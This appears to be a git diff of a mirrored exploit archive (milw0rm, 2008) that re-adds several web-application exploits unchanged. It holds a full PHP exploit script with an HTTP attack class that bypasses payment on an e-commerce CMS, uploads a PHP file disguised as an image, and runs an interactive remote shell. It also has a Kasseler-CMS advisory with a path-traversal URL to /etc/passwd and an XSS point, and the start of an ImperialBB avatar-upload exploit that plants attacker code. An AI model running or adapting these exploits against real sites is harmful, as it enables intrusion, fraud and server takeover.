-	 *                                frmdt_filename => 'hello.php,
-	 *                                frmdt_content => ''));
-	 *          $this->formdata($formdata);
-	 * 
-	 */
-	function formdata($array)
-	{
-		$this->target($array[frmdt_url]);
-		$this->method = 'formdata';
-		$this->data = '';
-		
-		if(!isset($array[frmdt_boundary]))
-		   $this->boundary = 'phpsploit';
-		else
-		   $this->boundary = $array[frmdt_boundary];
-
-		foreach($array as $key => $value)
-		{
-			if(!preg_match('#^frmdt_(boundary|url)#',$key))
-			{
-				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
-				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
-				
-				if(!is_array($value))
-				{
-					$this->data .= "\r\n\r\n".$value."\r\n";
-				}
-				else
-				{
-					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
-
-					if(isset($array[$key][frmdt_type]))
-					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
-
-					if(isset($array[$key][frmdt_transfert]))
-					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
-
-					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
-				}
-			}
-		}
-
-		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function returns the content
-	 * of the server response, without
-	 * the headers.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_content
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->get('http://localhost/'))
-	 * 
-	 */
-	function getcontent($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_content = '';
-		
-		for($i=1;$iserver_content .= $code[$i];
-
-		return $this->server_content;
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * of the server response, without
-	 * the content.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_header
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
-	 * 
-	 */
-	function getheader($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_header = $code[0];
-		
-		return $this->server_header;
-	}
-
-	
-	/**
-	 * This function is called by the
-	 * cookiejar() function. It adds the
-	 * value of the "Set-Cookie" header
-	 * in the "Cookie" header for the
-	 * next request. You don't have to
-	 * call it.
-	 * 
-	 * @access private
-	 * @param  string code ServerResponse
-	 * 
-	 */
-	function getcookie()
-	{
-		foreach(explode("\r\n",$this->getheader()) as $header)
-		{
-			if(preg_match('/set-cookie/i',$header))
-			{
-				$fequal = strpos($header,'=');
-				$fvirgu = strpos($header,';');
-				
-				// 12=strlen('set-cookie: ')
-				$cname  = substr($header,12,$fequal-12);
-				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
-				
-				$this->cookie[trim($cname)] = trim($cvalu);
-			}
-		}
-	}
-
-
-	/**
-	 * This function is called by the
-	 * get()/post() functions. You
-	 * don't have to call it.
-	 *
-	 * @access  private
-	 * @param   string urltarg Url
-	 * @example $this->target('http://localhost/')
-	 * 
-	 */
-	function target($urltarg)
-	{
-		if(!ereg('^http://',$urltarg))
-		   $urltarg = 'http://'.$urltarg;
-		   
-		$urlarr     = parse_url($urltarg);
-		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
-		
-		if(isset($urlarr['query']))
-		   $this->url .= '?'.$urlarr['query'];
-		
-		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
-		$this->host = $urlarr['host'];
-		
-		if($this->port != '80')
-		   $this->host .= ':'.$this->port;
-
-		if(!isset($urlarr['path']) or empty($urlarr['path']))
-		   die("Error: No path precised");
-
-		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
-
-		if($this->port > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-	
-	/**
-	 * If you call this function,
-	 * the script will extract all
-	 * 'Set-Cookie' headers values
-	 * and it will automatically add
-	 * them into the 'Cookie' header
-	 * for all next requests.
-	 *
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->cookiejar(0)
-	 * @example $this->cookiejar(1)
-	 * 
-	 */
-	function cookiejar($code)
-	{
-		if($code=='0')
-		   $this->cookiejar=FALSE;
-
-		elseif($code=='1')
-		   $this->cookiejar=TRUE;
-	}
-
-
-	/**
-	 * If you call this function,
-	 * the script will follow all
-	 * redirections sent by the server.
-	 * 
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->allowredirection(0)
-	 * @example $this->allowredirection(1)
-	 * 
-	 */
-	function allowredirection($code)
-	{
-		if($code=='0')
-		   $this->allowredirection=FALSE;
-		   
-		elseif($code=='1')
-		   $this->allowredirection=TRUE;
-	}
-
-	
-	/**
-	 * This function is called if
-	 * allowredirection() is enabled.
-	 * You don't have to call it.
-	 *
-	 * @access private
-	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
-	 * @return string $this->get($this->last_redirection)
-	 * @return string $this->recv;
-	 * 
-	 */
-	function getredirection()
-	{
-		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
-		{
-			$this->last_redirection = trim($codearr[2]);
-			
-			if(!ereg('://',$this->last_redirection))
-			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
-
-			else
-			   return $this->get($this->last_redirection);
-		}
-		else
-		   return $this->recv;
-	}
-
-
-	/**
-	 * This function allows you
-	 * to reset some parameters.
-	 * 
-	 * @access  public
-	 * @param   string func Param
-	 * @example $this->reset('header')
-	 * @example $this->reset('cookie')
-	 * @example $this->reset()
-	 * 
-	 */
-	function reset($func='')
-	{
-		switch($func)
-		{
-			case 'header':
-			$this->header = array('');
-			break;
-				
-			case 'cookie':
-			$this->cookie = array('');
-			break;
-				
-			default:
-			$this->cookiejar = '';
-			$this->header = array('');
-			$this->cookie = array('');
-			$this->allowredirection = '';
-			break;
-		}
-	}
-}
-
-?>
-
-# milw0rm.com [2008-07-05]
+#!/usr/bin/php
+                         |
+|          URL: http://blackh.free.fr - http://blackh.eu               |
+========================================================================
+| \$system> $argv[0] -url <> -a <1,2,3> -n <> -f <>                   |
+| Notes: -url       ex: http://victim.com/site/                        |
+|         -a        1 : Validate Command without Payment               |
+|                           -n Commmand number (ex: CDE5627JOC )       |
+|                   2 : Remote Code Execution                          |
+|                           -n Rubrique id  (ex: 1 )                   |
+|                   3 : Remote File Upload                             |
+|                           -n Rubrique id  (ex: 1 )                   |
+|                           -f Name of file (ex: leet.php )            |
+| For 2 and 3, the '/client/' directory  must not be forbidden         |
+========================================================================
+";exit(1);
+}
+
+$url = getparam('url',1);
+$action = getparam('a',1);
+$n = getparam('n',1);
+$f = getparam('f',0);
+
+$xpl = new phpsploit();
+$xpl->agent("Mozilla Firefox");
+
+switch($action) {
+
+	case '1':
+		valid_command($n);
+	break;
+	case '2':
+		remote_exec($n);
+	break;	
+	case '3':
+		remote_upload($n, $f);
+	break;
+	default:
+		die('Please choose an action.');
+	break;
+
+}
+
+# Validate Command without Payment
+function valid_command($n) {
+	global $xpl, $url;
+	
+	echo "\n[-] Change command statut";
+	echo "\n[-] Command: ".$n;
+	
+	
+		 if($xpl->post($url.'admin/commande_details.php?ref='.$n, 'ref='.$n.'&statutch=2'))	
+				die("\n[!] Done - Command is now 'paid' :))\n");	
+		else die("\n[!] Error - Maybe the code isn't good\n");
+	
+	exit(1);
+}
+
+# Remote Code Execution Exploit
+function remote_exec($n) {
+	global $xpl, $url;
+	
+	echo "\n[-] Remote Code Execution";
+
+	if(is_forbidden($url)) die("\n[!] Error - The /client/ directory is forbidden\n");
+		
+	$code = '';
+	$form = array(frmdt_url => $url.'admin/photo_rubrique.php',
+                  'action' => 'ajouter',
+                  'rubid' => $n,
+                  'photo1' => array(frmdt_filename => 'tapz.php',
+                                      frmdt_type => 'image/jpeg',
+                                      frmdt_content => $code));
+
+	if($xpl->formdata($form)) echo "\n[!] Done - Start Shell";
+	else die("\n[!] Error - Maybe the id isn't good\n");
+
+	$get = $xpl->get($url.'client/gfx/photos/rubrique/');
+	$tmp = preg_match('#tapz_([0-9]*).php#', $get, $file);
+
+	print "\n\$> ";
+
+while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){
+    $xpl->addheader('SHELL',$cmd);
+    $xpl->get($url.'client/gfx/photos/rubrique/'.$file[0]);	
+    print $xpl->getcontent()."\n\$> ";
+}
+}
+
+# Remote File Upload
+function remote_upload($n, $f) {
+	global $xpl, $url;
+	
+	echo "\n[-] Remote File Upload";
+	
+	if(is_forbidden($url)) die("\n[!] Error - The /client/ directory is forbidden\n");
+
+	$code = file_get_contents($f);
+	$form = array(frmdt_url => $url.'admin/photo_rubrique.php',
+                  'action' => 'ajouter',
+                  'rubid' => $n,
+                  'photo1' => array(frmdt_filename => $f,
+                                      frmdt_type => 'image/jpeg',
+                                      frmdt_content => $code));
+	
+	if($xpl->formdata($form) && $code) echo "\n[!] Done - Now go on $url/client/gfx/photos/rubrique";
+	else die("\n[!] Error - Maybe the id isn't good\n");
+
+}
+
+function is_forbidden($url) {
+	global $xpl, $url;
+
+	$get = $xpl->get($url.'/client/');
+		if (preg_match('#Forbidden#i', $get)) return true;
+		else return false;
+}
+
+# GetParam, function from acid-root.new.fr
+function getparam($param,$opt='')
+{
+	global $argv;
+	foreach($argv as $value => $key)
+	{
+		if($key == '-'.$param) return $argv[$value+1];
+	}
+	if($opt) exit("\n#error -$param parameter required");
+	else return;
+}
+
+/*
+ * 
+ * Copyright (C) darkfig
+ * 
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ * 
+ * TITLE:          PhpSploit Class
+ * REQUIREMENTS:   PHP 4 / PHP 5
+ * VERSION:        2.0
+ * LICENSE:        GNU General Public License
+ * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
+ * FILENAME:       phpsploitclass.php
+ *
+ * CONTACT:        gmdarkfig@gmail.com (french / english)
+ * GREETZ:         Sparah, Ddx39
+ *
+ * DESCRIPTION:
+ * The phpsploit is a class implementing a web user agent.
+ * You can add cookies, headers, use a proxy server with (or without) a
+ * basic authentification. It supports the GET and the POST method. It can
+ * also be used like a browser with the cookiejar() function (which allow
+ * a server to add several cookies for the next requests) and the
+ * allowredirection() function (which allow the script to follow all
+ * redirections sent by the server). It can return the content (or the
+ * headers) of the request. Others useful functions can be used for debugging.
+ * A manual is actually in development but to know how to use it, you can
+ * read the comments.
+ *
+ * CHANGELOG:
+ *
+ * [2007-06-10] (2.0)
+ *  * Code: Code optimization
+ *  * New: Compatible with PHP 4 by default
+ *
+ * [2007-01-24] (1.2)
+ *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
+ *  * New: multipart/form-data enctype is now supported 
+ *
+ * [2006-12-31] (1.1)
+ *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
+ *  * New: You can now call the getheader() / getcontent() function without parameters
+ *
+ * [2006-12-30] (1.0)
+ *  * First version
+ * 
+ */
+
+class phpsploit
+{
+	var $proxyhost;
+	var $proxyport;
+	var $host;
+	var $path;
+	var $port;
+	var $method;
+	var $url;
+	var $packet;
+	var $proxyuser;
+	var $proxypass;
+	var $header;
+	var $cookie;
+	var $data;
+	var $boundary;
+	var $allowredirection;
+	var $last_redirection;
+	var $cookiejar;
+	var $recv;
+	var $cookie_str;
+	var $header_str;
+	var $server_content;
+	var $server_header;
+	
+
+	/**
+	 * This function is called by the
+	 * get()/post()/formdata() functions.
+	 * You don't have to call it, this is
+	 * the main function.
+	 *
+	 * @access private
+	 * @return string $this->recv ServerResponse
+	 * 
+	 */
+	function sock()
+	{
+		if(!empty($this->proxyhost) && !empty($this->proxyport))
+		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
+		else
+		   $socket = @fsockopen($this->host,$this->port);
+		
+		if(!$socket)
+		   die("Error: Host seems down");
+		
+		if($this->method=='get')
+		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
+		   
+		elseif($this->method=='post' or $this->method=='formdata')
+		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
+		   
+		else
+		   die("Error: Invalid method");
+		
+		if(!empty($this->proxyuser))
+		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
+		
+		if(!empty($this->header))
+		   $this->packet .= $this->showheader();
+		   
+		if(!empty($this->cookie))
+		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
+	
+		$this->packet .= 'Host: '.$this->host."\r\n";
+		$this->packet .= "Connection: Close\r\n";
+		
+		if($this->method=='post')
+		{
+			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data."\r\n";
+		}
+		elseif($this->method=='formdata')
+		{
+			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data;
+		}
+
+		$this->packet .= "\r\n";
+		$this->recv = '';
+
+		fputs($socket,$this->packet);
+
+		while(!feof($socket))
+		   $this->recv .= fgets($socket);
+
+		fclose($socket);
+
+		if($this->cookiejar)
+		   $this->getcookie();
+
+		if($this->allowredirection)
+		   return $this->getredirection();
+		else
+		   return $this->recv;
+	}
+	
+
+	/**
+	 * This function allows you to add several
+	 * cookies in the request.
+	 * 
+	 * @access  public
+	 * @param   string cookn CookieName
+	 * @param   string cookv CookieValue
+	 * @example $this->addcookie('name','value')
+	 * 
+	 */
+	function addcookie($cookn,$cookv)
+	{
+		if(!isset($this->cookie))
+		   $this->cookie = array();
+
+		$this->cookie[$cookn] = $cookv;
+	}
+
+
+	/**
+	 * This function allows you to add several
+	 * headers in the request.
+	 *
+	 * @access  public
+	 * @param   string headern HeaderName
+	 * @param   string headervalue Headervalue
+	 * @example $this->addheader('Client-IP', '128.5.2.3')
+	 * 
+	 */
+	function addheader($headern,$headervalue)
+	{
+		if(!isset($this->header))
+		   $this->header = array();
+		   
+		$this->header[$headern] = $headervalue;
+	}
+
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server. Several methods
+	 * are supported.
+	 * 
+	 * @access  public
+	 * @param   string proxy ProxyHost
+	 * @param   integer proxyp ProxyPort
+	 * @example $this->proxy('localhost',8118)
+	 * @example $this->proxy('localhost:8118')
+	 * 
+	 */
+	function proxy($proxy,$proxyp='')
+	{
+		if(empty($proxyp))
+		{
+			$proxarr = explode(':',$proxy);
+			$this->proxyhost = $proxarr[0];
+			$this->proxyport = (int)$proxarr[1];
+		}
+		else 
+		{
+			$this->proxyhost = $proxy;
+			$this->proxyport = (int)$proxyp;
+		}
+
+		if($this->proxyport > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server which requires a
+	 * basic authentification. Several
+	 * methods are supported:
+	 *
+	 * @access  public
+	 * @param   string proxyauth ProxyUser
+	 * @param   string proxypass ProxyPass
+	 * @example $this->proxyauth('user','pwd')
+	 * @example $this->proxyauth('user:pwd');
+	 * 
+	 */
+	function proxyauth($proxyauth,$proxypass='')
+	{
+		if(empty($proxypass))
+		{
+			$posvirg = strpos($proxyauth,':');
+			$this->proxyuser = substr($proxyauth,0,$posvirg);
+			$this->proxypass = substr($proxyauth,$posvirg+1);
+		}
+		else
+		{
+			$this->proxyuser = $proxyauth;
+			$this->proxypass = $proxypass;
+		}
+	}
+
+
+	/**
+	 * This function allows you to set
+	 * the 'User-Agent' header.
+	 * 
+	 * @access  public
+	 * @param   string useragent Agent
+	 * @example $this->agent('Firefox')
+	 * 
+	 */
+	function agent($useragent)
+	{
+		$this->addheader('User-Agent',$useragent);
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->header_str Headers
+	 * @example $this->showheader()
+	 * 
+	 */
+	function showheader()
+	{
+		$this->header_str = '';
+		
+		if(!isset($this->header))
+		   return;
+		   
+		foreach($this->header as $name => $value)
+		   $this->header_str .= $name.': '.$value."\r\n";
+		   
+		return $this->header_str;
+	}
+
+	
+	/**
+	 * This function returns the cookies
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->cookie_str Cookies
+	 * @example $this->showcookie()
+	 * 
+	 */
+	function showcookie()
+	{
+		$this->cookie_str = '';
+		
+		if(!isset($this->cookie))
+		   return;
+		
+		foreach($this->cookie as $name => $value)
+		   $this->cookie_str .= $name.'='.$value.'; ';
+
+		return $this->cookie_str;
+	}
+
+
+	/**
+	 * This function returns the last
+	 * formed http request.
+	 * 
+	 * @access  public
+	 * @return  string $this->packet HttpPacket
+	 * @example $this->showlastrequest()
+	 * 
+	 */
+	function showlastrequest()
+	{
+		if(!isset($this->packet))
+		   return;
+		else
+		   return $this->packet;
+	}
+
+
+	/**
+	 * This function sends the formed
+	 * http packet with the GET method.
+	 * 
+	 * @access  public
+	 * @param   string url Url
+	 * @return  string $this->sock()
+	 * @example $this->get('localhost/index.php?var=x')
+	 * @example $this->get('http://localhost:88/tst.php')
+	 * 
+	 */
+	function get($url)
+	{
+		$this->target($url);
+		$this->method = 'get';
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function sends the formed
+	 * http packet with the POST method.
+	 *
+	 * @access  public
+	 * @param   string url  Url
+	 * @param   string data PostData
+	 * @return  string $this->sock()
+	 * @example $this->post('http://localhost/','helo=x')
+	 * 
+	 */	
+	function post($url,$data)
+	{
+		$this->target($url);
+		$this->method = 'post';
+		$this->data = $data;
+		return $this->sock();
+	}
+	
+
+	/**
+	 * This function sends the formed http
+	 * packet with the POST method using
+	 * the multipart/form-data enctype.
+	 * 
+	 * @access  public
+	 * @param   array array FormDataArray
+	 * @return  string $this->sock()
+	 * @example $formdata = array(
+	 *                      frmdt_url => 'http://localhost/upload.php',
+	 *                      frmdt_boundary => '123456', # Optional
+	 *                      'var' => 'example',
+	 *                      'file' => array(
+	 *                                frmdt_type => 'image/gif',  # Optional
+	 *                                frmdt_transfert => 'binary' # Optional
+	 *                                frmdt_filename => 'hello.php,
+	 *                                frmdt_content => ''));
+	 *          $this->formdata($formdata);
+	 * 
+	 */
+	function formdata($array)
+	{
+		$this->target($array[frmdt_url]);
+		$this->method = 'formdata';
+		$this->data = '';
+		
+		if(!isset($array[frmdt_boundary]))
+		   $this->boundary = 'phpsploit';
+		else
+		   $this->boundary = $array[frmdt_boundary];
+
+		foreach($array as $key => $value)
+		{
+			if(!preg_match('#^frmdt_(boundary|url)#',$key))
+			{
+				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
+				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
+				
+				if(!is_array($value))
+				{
+					$this->data .= "\r\n\r\n".$value."\r\n";
+				}
+				else
+				{
+					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
+
+					if(isset($array[$key][frmdt_type]))
+					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
+
+					if(isset($array[$key][frmdt_transfert]))
+					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
+
+					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
+				}
+			}
+		}
+
+		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function returns the content
+	 * of the server response, without
+	 * the headers.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_content
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->get('http://localhost/'))
+	 * 
+	 */
+	function getcontent($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_content = '';
+		
+		for($i=1;$iserver_content .= $code[$i];
+
+		return $this->server_content;
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * of the server response, without
+	 * the content.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_header
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
+	 * 
+	 */
+	function getheader($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_header = $code[0];
+		
+		return $this->server_header;
+	}
+
+	
+	/**
+	 * This function is called by the
+	 * cookiejar() function. It adds the
+	 * value of the "Set-Cookie" header
+	 * in the "Cookie" header for the
+	 * next request. You don't have to
+	 * call it.
+	 * 
+	 * @access private
+	 * @param  string code ServerResponse
+	 * 
+	 */
+	function getcookie()
+	{
+		foreach(explode("\r\n",$this->getheader()) as $header)
+		{
+			if(preg_match('/set-cookie/i',$header))
+			{
+				$fequal = strpos($header,'=');
+				$fvirgu = strpos($header,';');
+				
+				// 12=strlen('set-cookie: ')
+				$cname  = substr($header,12,$fequal-12);
+				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
+				
+				$this->cookie[trim($cname)] = trim($cvalu);
+			}
+		}
+	}
+
+
+	/**
+	 * This function is called by the
+	 * get()/post() functions. You
+	 * don't have to call it.
+	 *
+	 * @access  private
+	 * @param   string urltarg Url
+	 * @example $this->target('http://localhost/')
+	 * 
+	 */
+	function target($urltarg)
+	{
+		if(!ereg('^http://',$urltarg))
+		   $urltarg = 'http://'.$urltarg;
+		   
+		$urlarr     = parse_url($urltarg);
+		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
+		
+		if(isset($urlarr['query']))
+		   $this->url .= '?'.$urlarr['query'];
+		
+		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
+		$this->host = $urlarr['host'];
+		
+		if($this->port != '80')
+		   $this->host .= ':'.$this->port;
+
+		if(!isset($urlarr['path']) or empty($urlarr['path']))
+		   die("Error: No path precised");
+
+		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
+
+		if($this->port > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+	
+	/**
+	 * If you call this function,
+	 * the script will extract all
+	 * 'Set-Cookie' headers values
+	 * and it will automatically add
+	 * them into the 'Cookie' header
+	 * for all next requests.
+	 *
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->cookiejar(0)
+	 * @example $this->cookiejar(1)
+	 * 
+	 */
+	function cookiejar($code)
+	{
+		if($code=='0')
+		   $this->cookiejar=FALSE;
+
+		elseif($code=='1')
+		   $this->cookiejar=TRUE;
+	}
+
+
+	/**
+	 * If you call this function,
+	 * the script will follow all
+	 * redirections sent by the server.
+	 * 
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->allowredirection(0)
+	 * @example $this->allowredirection(1)
+	 * 
+	 */
+	function allowredirection($code)
+	{
+		if($code=='0')
+		   $this->allowredirection=FALSE;
+		   
+		elseif($code=='1')
+		   $this->allowredirection=TRUE;
+	}
+
+	
+	/**
+	 * This function is called if
+	 * allowredirection() is enabled.
+	 * You don't have to call it.
+	 *
+	 * @access private
+	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
+	 * @return string $this->get($this->last_redirection)
+	 * @return string $this->recv;
+	 * 
+	 */
+	function getredirection()
+	{
+		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
+		{
+			$this->last_redirection = trim($codearr[2]);
+			
+			if(!ereg('://',$this->last_redirection))
+			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
+
+			else
+			   return $this->get($this->last_redirection);
+		}
+		else
+		   return $this->recv;
+	}
+
+
+	/**
+	 * This function allows you
+	 * to reset some parameters.
+	 * 
+	 * @access  public
+	 * @param   string func Param
+	 * @example $this->reset('header')
+	 * @example $this->reset('cookie')
+	 * @example $this->reset()
+	 * 
+	 */
+	function reset($func='')
+	{
+		switch($func)
+		{
+			case 'header':
+			$this->header = array('');
+			break;
+				
+			case 'cookie':
+			$this->cookie = array('');
+			break;
+				
+			default:
+			$this->cookiejar = '';
+			$this->header = array('');
+			$this->cookie = array('');
+			$this->allowredirection = '';
+			break;
+		}
+	}
+}
+
+?>
+
+# milw0rm.com [2008-07-05]
diff --git a/platforms/php/webapps/6007.txt b/platforms/php/webapps/6007.txt
index 1422ed8ed..c787dfa26 100755
--- a/platforms/php/webapps/6007.txt
+++ b/platforms/php/webapps/6007.txt
@@ -1,15 +1,15 @@
-Cr@zy_King / sqL L0v3r'Z Crew Co. 2008 // From Turkey
-
-http://biyosecurity.com / If there isn't the devotion Success there... : )
-
-Greatz : aLL my Friend'z
-
-Kasseler-Cms (LFI/XSS) Multiple Remote Vulnerabilities
-
-Down : http://www.kasseler-cms.net
-
-LFI : http://127.0.0.1/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd
-
-Xss : http://127.0.0.1/http://www.kasseler-cms.net/index.php?module=Files&do=Category&cid=[XSS] 
-
-# milw0rm.com [2008-07-05]
+Cr@zy_King / sqL L0v3r'Z Crew Co. 2008 // From Turkey
+
+http://biyosecurity.com / If there isn't the devotion Success there... : )
+
+Greatz : aLL my Friend'z
+
+Kasseler-Cms (LFI/XSS) Multiple Remote Vulnerabilities
+
+Down : http://www.kasseler-cms.net
+
+LFI : http://127.0.0.1/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd
+
+Xss : http://127.0.0.1/http://www.kasseler-cms.net/index.php?module=Files&do=Category&cid=[XSS] 
+
+# milw0rm.com [2008-07-05]
diff --git a/platforms/php/webapps/6008.php b/platforms/php/webapps/6008.php
index 5cf8ffc08..c9225fc54 100755
--- a/platforms/php/webapps/6008.php
+++ b/platforms/php/webapps/6008.php
@@ -1,126 +1,126 @@
-Title     :    ImperialBB <= 2.3.5 Remote File Upload Vulnerability
-Date      :    5th July 2008
-Found by  :    PHPLizardo - http://phplizardo.2gb.fr
-Greetz    :    Gu1ll4um3r0m41n
-
-Howto     :    1. Go to your User Control Panel
-               2. Upload any file you want
-               3. Tamper the request and change the mime-type to : image/gif
-               4. There is your file : http://site.com/[forum_path]/images/avatars/uploads/[your_nickname]_[filename].[ext]
-			   
-) :\r\n\n";
-	$code     =   trim(fgets(STDIN));
-	
-	$socket   =   @fsockopen($argv[1], 80, $eno, $estr, 30);
-	if(!$socket)
-	{
-		die("Could not connect to ".$argv[1].". Operation aborted.");
-	}
-	
-	$part1      =   "POST " . $argv[2] . "profile.php?func=edit HTTP/1.1\r\n";
-	$part1     .=   "Host: " . $argv[1] . "\r\n";
-	$part1     .=   "Accept: */*\r\n";
-	$part1     .=   "Connection: Close\r\n";
-	$part1     .=   "Cookie: UserName=" . $argv[3] . "; Password=" . md5(md5($argv[4])) . "\r\n";
-	$part1     .=   "Content-Type: multipart/form-data; boundary=---------------------------200831142015814\r\n";
-	
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"Email\"\r\n\r\n";
-	$part2     .=   "test@test.test\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"Email2\"\r\n\r\n";
-	$part2     .=   "test@test.test\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"PassWord\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"Pass2\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"signature\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"aim\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"icq\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"msn\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"yahoo\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"Remote_Avatar_URL\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"Upload_Avatar\"; filename=\"funypicture.php\"\r\n";
-	$part2     .=   "Content-Type: image/gif\r\n\r\n";
-	$part2     .=   $code."\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"month\"\r\n\r\n";
-	$part2     .=   "00\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"day\"\r\n\r\n";
-	$part2     .=   "00\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
